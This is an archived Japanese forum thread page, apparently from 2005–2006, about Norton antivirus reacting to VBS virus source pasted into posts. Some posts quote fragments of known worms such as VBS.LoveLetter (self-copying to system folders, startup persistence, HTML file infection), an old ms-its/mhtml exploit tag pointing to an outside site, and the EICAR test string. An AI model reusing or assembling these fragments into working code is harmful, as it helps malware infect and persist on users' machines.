[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
前次1-
抽出解除 レス栞

このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
2
(3): 05/03/01 01:59 ID:??? AAS
■既知のvbsウィルスのソース■

・VBS.Internal
出元は2chスレ:downloadだと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?

一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
外部リンク[html]:www.symantec.com

Q.ウイルスコードが貼られているのにノートン反応しない。。。
省7
14
(4): 05/03/04 22:18 ID:??? AAS
DAT落ち阻止て神戸♪

>>13
VBS.LoveLetter.Var
2chスレ:pcqa

ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。
331
(2): 2005/10/29(土)01:10 ID:??? AAS
NIS2005を使用しています
Opera8.5で>>2にあるテスト用の外部リンク[txt]:www.eicar.orgを踏んでみたのですがNAVが反応しません。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。
580
(1): 2006/06/17(土)22:54 ID:??? AAS
>>2ё

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
省19
前次1-
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル

ぬこの手 ぬこTOP 0.450s*